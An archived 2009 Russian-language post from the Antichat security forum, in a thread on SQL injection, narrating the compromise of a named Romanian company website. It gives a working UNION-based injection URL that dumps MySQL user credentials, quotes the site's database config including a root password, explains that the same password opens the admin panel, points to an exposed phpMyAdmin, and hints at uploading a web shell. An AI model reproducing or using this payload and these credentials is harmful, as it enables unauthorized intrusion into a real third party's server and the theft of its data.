Форум АНТИЧАТ - SQL Инъекции

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Куяк!

#11

06.03.2009, 05:13

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Куяк!

http://www.ricosrl.ro

Крутится на 4м мускуле. Хитрый администратор сдул подчистую эту партию.

Дыра:
http://www.ricosrl.ro/lucrari/lucrare.php?lucrare=-1+union+select+concat_ws(0x3a3a,User,password,user ()),2,3+from+mysql.user/*

Таблицы не подбрутились, но чудо-юзер имеет FILE_PRIV = YES. Порывшись в скриптах, находим конфиг и в нем:

define('_HOST','localhost');
define('_USER','root');
define('_PASS','rico1991');
define('_DATABASE','photon_rico');

Детально изучив файлы отвечающие за аутентификацию - видим, что логин жестко забит в скрипте, а именно:
login: user
Пароль же берется от регов указанных в конфиге к БД:
pass: rico1991

http://www.ricosrl.ro/administrare/ <- сама админка

Но админка беспонтовая и шелл через нее не залить, поэтому смотрим дальше.

http://www.ricosrl.ro/admin/ <- лежит пхпмайадмин

Берем реги из конфига и коннектимся.

Как залить шелл далее понятно =)